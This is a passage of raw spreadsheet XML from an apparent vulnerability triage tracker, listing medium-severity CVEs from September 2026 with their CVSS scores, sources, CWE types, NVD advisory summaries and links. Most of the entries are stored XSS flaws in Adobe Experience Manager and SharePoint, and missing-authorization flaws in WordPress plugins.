t="n"><v>5.4</v></c><c r="E2002" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2002" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2002" s="5" t="inlineStr" /><c r="H2002" s="5" t="n"><v>0.003</v></c><c r="I2002" s="5" t="inlineStr" /><c r="J2002" s="5" t="inlineStr" /><c r="K2002" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2002" s="5" t="inlineStr" /><c r="M2002" s="5" t="inlineStr" /><c r="N2002" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2002" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2002" s="5" t="inlineStr" /><c r="Q2002" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R200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02" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64866</t></is></c></row><row r="2003"><c r="A2003" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2003" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2003" s="5" t="inlineStr"><is><t>CVE-2025-64868</t></is></c><c r="D2003" s="5" t="n"><v>5.4</v></c><c r="E2003" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2003" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2003" s="5" t="inlineStr" /><c r="H2003" s="5" t="n"><v>0.003</v></c><c r="I2003" s="5" t="inlineStr" /><c r="J2003" s="5" t="inlineStr" /><c r="K2003" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2003" s="5" t="inlineStr" /><c r="M2003" s="5" t="inlineStr" /><c r="N2003" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2003" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2003" s="5" t="inlineStr" /><c r="Q2003" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R200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03" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64868</t></is></c></row><row r="2004"><c r="A2004" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2004" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2004" s="5" t="inlineStr"><is><t>CVE-2026-12843</t></is></c><c r="D2004" s="5" t="n"><v>5.4</v></c><c r="E2004" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2004" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G2004" s="5" t="inlineStr" /><c r="H2004" s="5" t="n"><v>0.002</v></c><c r="I2004" s="5" t="inlineStr" /><c r="J2004" s="5" t="inlineStr" /><c r="K2004" s="5" t="inlineStr" /><c r="L2004" s="5" t="inlineStr" /><c r="M2004" s="5" t="inlineStr" /><c r="N2004" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2004" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2004" s="5" t="inlineStr" /><c r="Q2004" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2004" s="5" t="inlineStr"><is><t>The LearnDash LMS plugin for WordPress is vulnerable to authorization bypass in versions 4.25.0 - 5.1.6. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to enroll arbitrary users in paid courses without payment verification, bypassing the entire payment system and gaining unauthorized access to premium educational content.</t></is></c><c r="S2004" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12843</t></is></c></row><row r="2005"><c r="A2005" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2005" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2005" s="5" t="inlineStr"><is><t>CVE-2026-15247</t></is></c><c r="D2005" s="5" t="n"><v>5.4</v></c><c r="E2005" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2005" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2005" s="5" t="inlineStr" /><c r="H2005" s="5" t="n"><v>0.002</v></c><c r="I2005" s="5" t="inlineStr" /><c r="J2005" s="5" t="inlineStr" /><c r="K2005" s="5" t="inlineStr" /><c r="L2005" s="5" t="inlineStr" /><c r="M2005" s="5" t="inlineStr" /><c r="N2005" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2005" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2005" s="5" t="inlineStr" /><c r="Q2005" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2005" s="5" t="inlineStr"><is><t>The Search Atlas SEO  WordPress plugin before 2.6.24 does not perform a nonce or capability check before processing a settings update in one of its early-priority handlers, allowing any authenticated user such as a Subscriber to overwrite or delete the site's stored Google service-account credentials.</t></is></c><c r="S2005" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-15247</t></is></c></row><row r="2006"><c r="A2006" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2006" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2006" s="5" t="inlineStr"><is><t>CVE-2026-16892</t></is></c><c r="D2006" s="5" t="n"><v>5.4</v></c><c r="E2006" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2006" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G2006" s="5" t="inlineStr" /><c r="H2006" s="5" t="n"><v>0.003</v></c><c r="I2006" s="5" t="inlineStr" /><c r="J2006" s="5" t="inlineStr" /><c r="K2006" s="5" t="inlineStr"><is><t>ibm:i</t></is></c><c r="L2006" s="5" t="inlineStr" /><c r="M2006" s="5" t="inlineStr" /><c r="N2006" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2006" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2006" s="5" t="inlineStr" /><c r="Q2006" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="R2006" s="5" t="inlineStr"><is><t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to bypass security restrictions due to improper authentication during service-name matching.</t></is></c><c r="S2006" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16892</t></is></c></row><row r="2007"><c r="A2007" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2007" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2007" s="5" t="inlineStr"><is><t>CVE-2026-18957</t></is></c><c r="D2007" s="5" t="n"><v>5.4</v></c><c r="E2007" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2007" s="5" t="inlineStr"><is><t>iletisim@usom.gov.tr</t></is></c><c r="G2007" s="5" t="inlineStr" /><c r="H2007" s="5" t="n"><v>0.002</v></c><c r="I2007" s="5" t="inlineStr" /><c r="J2007" s="5" t="inlineStr" /><c r="K2007" s="5" t="inlineStr" /><c r="L2007" s="5" t="inlineStr" /><c r="M2007" s="5" t="inlineStr" /><c r="N2007" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2007" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2007" s="5" t="inlineStr" /><c r="Q2007" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2007" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Menulux Software Inc. Menulux Portal allows Stored XSS.

This issue affects Menulux Portal: before 20260903211448.</t></is></c><c r="S2007" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18957</t></is></c></row><row r="2008"><c r="A2008" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2008" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2008" s="5" t="inlineStr"><is><t>CVE-2026-19057</t></is></c><c r="D2008" s="5" t="n"><v>5.4</v></c><c r="E2008" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2008" s="5" t="inlineStr"><is><t>iletisim@usom.gov.tr</t></is></c><c r="G2008" s="5" t="inlineStr" /><c r="H2008" s="5" t="n"><v>0.001</v></c><c r="I2008" s="5" t="inlineStr" /><c r="J2008" s="5" t="inlineStr" /><c r="K2008" s="5" t="inlineStr" /><c r="L2008" s="5" t="inlineStr" /><c r="M2008" s="5" t="inlineStr" /><c r="N2008" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2008" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2008" s="5" t="inlineStr" /><c r="Q2008" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2008" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Gastromenum Gastromenum Ticket and QR Menu System allows Stored XSS.

This issue affects Gastromenum Ticket and QR Menu System: before 2026.08.31.</t></is></c><c r="S2008" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19057</t></is></c></row><row r="2009"><c r="A2009" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2009" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2009" s="5" t="inlineStr"><is><t>CVE-2026-19479</t></is></c><c r="D2009" s="5" t="n"><v>5.4</v></c><c r="E2009" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2009" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2009" s="5" t="inlineStr" /><c r="H2009" s="5" t="n"><v>0.003</v></c><c r="I2009" s="5" t="inlineStr" /><c r="J2009" s="5" t="inlineStr" /><c r="K2009" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2009" s="5" t="inlineStr" /><c r="M2009" s="5" t="inlineStr" /><c r="N2009" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2009" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2009" s="5" t="inlineStr" /><c r="Q2009" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R200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09" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19479</t></is></c></row><row r="2010"><c r="A2010" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2010" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2010" s="5" t="inlineStr"><is><t>CVE-2026-19612</t></is></c><c r="D2010" s="5" t="n"><v>5.4</v></c><c r="E2010" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2010" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2010" s="5" t="inlineStr" /><c r="H2010" s="5" t="n"><v>0.003</v></c><c r="I2010" s="5" t="inlineStr" /><c r="J2010" s="5" t="inlineStr" /><c r="K2010" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2010" s="5" t="inlineStr" /><c r="M2010" s="5" t="inlineStr" /><c r="N2010" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2010" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2010" s="5" t="inlineStr" /><c r="Q2010" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R201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10" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19612</t></is></c></row><row r="2011"><c r="A2011" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2011" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2011" s="5" t="inlineStr"><is><t>CVE-2026-19644</t></is></c><c r="D2011" s="5" t="n"><v>5.4</v></c><c r="E2011" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2011" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2011" s="5" t="inlineStr" /><c r="H2011" s="5" t="n"><v>0.003</v></c><c r="I2011" s="5" t="inlineStr" /><c r="J2011" s="5" t="inlineStr" /><c r="K2011" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2011" s="5" t="inlineStr" /><c r="M2011" s="5" t="inlineStr" /><c r="N2011" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2011" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2011" s="5" t="inlineStr" /><c r="Q2011" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R201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11" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19644</t></is></c></row><row r="2012"><c r="A2012" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2012" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2012" s="5" t="inlineStr"><is><t>CVE-2026-19713</t></is></c><c r="D2012" s="5" t="n"><v>5.4</v></c><c r="E2012" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2012" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2012" s="5" t="inlineStr" /><c r="H2012" s="5" t="n"><v>0.003</v></c><c r="I2012" s="5" t="inlineStr" /><c r="J2012" s="5" t="inlineStr" /><c r="K2012" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2012" s="5" t="inlineStr" /><c r="M2012" s="5" t="inlineStr" /><c r="N2012" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2012" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2012" s="5" t="inlineStr" /><c r="Q2012" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R201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12" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19713</t></is></c></row><row r="2013"><c r="A2013" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2013" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2013" s="5" t="inlineStr"><is><t>CVE-2026-2520</t></is></c><c r="D2013" s="5" t="n"><v>5.4</v></c><c r="E2013" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2013" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G2013" s="5" t="inlineStr" /><c r="H2013" s="5" t="n"><v>0.002</v></c><c r="I2013" s="5" t="inlineStr" /><c r="J2013" s="5" t="inlineStr" /><c r="K2013" s="5" t="inlineStr" /><c r="L2013" s="5" t="inlineStr" /><c r="M2013" s="5" t="inlineStr" /><c r="N2013" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2013" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2013" s="5" t="inlineStr" /><c r="Q2013" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2013" s="5" t="inlineStr"><is><t>The Online Scheduling and Appointment Booking System – Bookly plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'updateAddon' function in all versions up to, and including, 27.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update any plugin with a main file of 'main.php' to its latest version.</t></is></c><c r="S2013" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-2520</t></is></c></row><row r="2014"><c r="A2014" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2014" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2014" s="5" t="inlineStr"><is><t>CVE-2026-27227</t></is></c><c r="D2014" s="5" t="n"><v>5.4</v></c><c r="E2014" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2014" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2014" s="5" t="inlineStr" /><c r="H2014" s="5" t="n"><v>0.003</v></c><c r="I2014" s="5" t="inlineStr" /><c r="J2014" s="5" t="inlineStr" /><c r="K2014" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2014" s="5" t="inlineStr" /><c r="M2014" s="5" t="inlineStr" /><c r="N2014" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2014" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2014" s="5" t="inlineStr" /><c r="Q2014" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R201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14" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-27227</t></is></c></row><row r="2015"><c r="A2015" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2015" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2015" s="5" t="inlineStr"><is><t>CVE-2026-52307</t></is></c><c r="D2015" s="5" t="n"><v>5.4</v></c><c r="E2015" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2015" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2015" s="5" t="inlineStr" /><c r="H2015" s="5" t="n"><v>0.003</v></c><c r="I2015" s="5" t="inlineStr" /><c r="J2015" s="5" t="inlineStr" /><c r="K2015" s="5" t="inlineStr" /><c r="L2015" s="5" t="inlineStr" /><c r="M2015" s="5" t="inlineStr" /><c r="N2015" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2015" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2015" s="5" t="inlineStr" /><c r="Q2015" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2015" s="5" t="inlineStr"><is><t>An authenticated stored cross-site scripting (XSS) vulnerability in the Column Management component of ClassCMS 1CMS v5.6 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the title field.</t></is></c><c r="S2015" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52307</t></is></c></row><row r="2016"><c r="A2016" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2016" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2016" s="5" t="inlineStr"><is><t>CVE-2026-55513</t></is></c><c r="D2016" s="5" t="n"><v>5.4</v></c><c r="E2016" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2016" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G2016" s="5" t="inlineStr" /><c r="H2016" s="5" t="n"><v>0.002</v></c><c r="I2016" s="5" t="inlineStr" /><c r="J2016" s="5" t="inlineStr" /><c r="K2016" s="5" t="inlineStr" /><c r="L2016" s="5" t="inlineStr" /><c r="M2016" s="5" t="inlineStr" /><c r="N2016" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2016" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2016" s="5" t="inlineStr" /><c r="Q2016" s="5" t="inlineStr"><is><t>CWE-613</t></is></c><c r="R2016" s="5" t="inlineStr"><is><t>nebula-mesh is a self-hosted control plane for Slack Nebula mesh VPN. From version 0.3.0 to before version 0.5.0, the nebula-mgmt Web UI host-creation path ignores both the server-wide enrollment_token_ttl security setting and per-network network_config.enrollment_token_ttl overrides. API host creation and token-regeneration paths use the configured TTL resolver, but POST /ui/hosts hardcodes now.Add(24 * time.Hour) for newly minted agent enrollment tokens. In deployments that intentionally reduce enrollment-token lifetime, any authenticated operator who can create a host through the Web UI can still mint a bearer enrollment token valid for about 24 hours. This issue has been patched in version 0.5.0.</t></is></c><c r="S2016" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55513</t></is></c></row><row r="2017"><c r="A2017" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2017" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2017" s="5" t="inlineStr"><is><t>CVE-2026-69402</t></is></c><c r="D2017" s="5" t="n"><v>5.4</v></c><c r="E2017" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2017" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2017" s="5" t="inlineStr" /><c r="H2017" s="5" t="n"><v>0.004</v></c><c r="I2017" s="5" t="inlineStr" /><c r="J2017" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K2017" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L2017" s="5" t="inlineStr" /><c r="M2017" s="5" t="inlineStr" /><c r="N2017" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2017" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2017" s="5" t="inlineStr" /><c r="Q2017" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2017" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="S2017" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69402</t></is></c></row><row r="2018"><c r="A2018" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2018" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2018" s="5" t="inlineStr"><is><t>CVE-2026-69417</t></is></c><c r="D2018" s="5" t="n"><v>5.4</v></c><c r="E2018" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2018" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2018" s="5" t="inlineStr" /><c r="H2018" s="5" t="n"><v>0.004</v></c><c r="I2018" s="5" t="inlineStr" /><c r="J2018" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K2018" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L2018" s="5" t="inlineStr" /><c r="M2018" s="5" t="inlineStr" /><c r="N2018" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2018" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2018" s="5" t="inlineStr" /><c r="Q2018" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2018" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="S2018" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69417</t></is></c></row><row r="2019"><c r="A2019" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2019" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2019" s="5" t="inlineStr"><is><t>CVE-2026-69690</t></is></c><c r="D2019" s="5" t="n"><v>5.4</v></c><c r="E2019" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2019" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2019" s="5" t="inlineStr" /><c r="H2019" s="5" t="n"><v>0.004</v></c><c r="I2019" s="5" t="inlineStr" /><c r="J2019" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K2019" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L2019" s="5" t="inlineStr" /><c r="M2019" s="5" t="inlineStr" /><c r="N2019" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2019" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2019" s="5" t="inlineStr" /><c r="Q2019" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2019" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="S2019" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69690</t></is></c></row><row r="2020"><c r="A2020" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2020" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2020" s="5" t="inlineStr"><is><t>CVE-2026-71356</t></is></c><c r="D2020" s="5" t="n"><v>5.4</v></c><c r="E2020" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2020" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2020" s="5" t="inlineStr" /><c r="H2020" s="5" t="n"><v>0.003</v></c><c r="I2020" s="5" t="inlineStr" /><c r="J2020" s="5" t="inlineStr" /><c r="K2020" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2020" s="5" t="inlineStr" /><c r="M2020" s="5" t="inlineStr" /><c r="N2020" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2020" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2020" s="5" t="inlineStr" /><c r="Q2020" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R202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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71356</t></is></c></row><row r="2021"><c r="A2021" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2021" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2021" s="5" t="inlineStr"><is><t>CVE-2026-71357</t></is></c><c r="D2021" s="5" t="n"><v>5.4</v></c><c r="E2021" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2021" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2021" s="5" t="inlineStr" /><c r="H2021" s="5" t="n"><v>0.003</v></c><c r="I2021" s="5" t="inlineStr" /><c r="J2021" s="5" t="inlineStr" /><c r="K2021" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2021" s="5" t="inlineStr" /><c r="M2021" s="5" t="inlineStr" /><c r="N2021" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2021" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2021" s="5" t="inlineStr" /><c r="Q2021" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R202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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71357</t></is></c></row><row r="2022"><c r="A2022" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2022" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2022" s="5" t="inlineStr"><is><t>CVE-2026-71388</t></is></c><c r="D2022" s="5" t="n"><v>5.4</v></c><c r="E2022" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2022" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2022" s="5" t="inlineStr" /><c r="H2022" s="5" t="n"><v>0.003</v></c><c r="I2022" s="5" t="inlineStr" /><c r="J2022" s="5" t="inlineStr" /><c r="K2022" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2022" s="5" t="inlineStr" /><c r="M2022" s="5" t="inlineStr" /><c r="N2022" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2022" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2022" s="5" t="inlineStr" /><c r="Q2022" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R202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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71388</t></is></c></row><row r="2023"><c r="A2023" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2023" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2023" s="5" t="inlineStr"><is><t>CVE-2026-71440</t></is></c><c r="D2023" s="5" t="n"><v>5.4</v></c><c r="E2023" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2023" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2023" s="5" t="inlineStr" /><c r="H2023" s="5" t="n"><v>0.002</v></c><c r="I2023" s="5" t="inlineStr" /><c r="J2023" s="5" t="inlineStr" /><c r="K2023" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2023" s="5" t="inlineStr" /><c r="M2023" s="5" t="inlineStr" /><c r="N2023" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2023" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2023" s="5" t="inlineStr" /><c r="Q2023" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R202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23" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71440</t></is></c></row><row r="2024"><c r="A2024" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2024" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2024" s="5" t="inlineStr"><is><t>CVE-2026-71565</t></is></c><c r="D2024" s="5" t="n"><v>5.4</v></c><c r="E2024" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2024" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2024" s="5" t="inlineStr" /><c r="H2024" s="5" t="n"><v>0.002</v></c><c r="I2024" s="5" t="inlineStr" /><c r="J2024" s="5" t="inlineStr" /><c r="K2024" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2024" s="5" t="inlineStr" /><c r="M2024" s="5" t="inlineStr" /><c r="N2024" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2024" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2024" s="5" t="inlineStr" /><c r="Q2024" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R202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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71565</t></is></c></row><row r="2025"><c r="A2025" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2025" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2025" s="5" t="inlineStr"><is><t>CVE-2026-72626</t></is></c><c r="D2025" s="5" t="n"><v>5.4</v></c><c r="E2025" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2025" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c 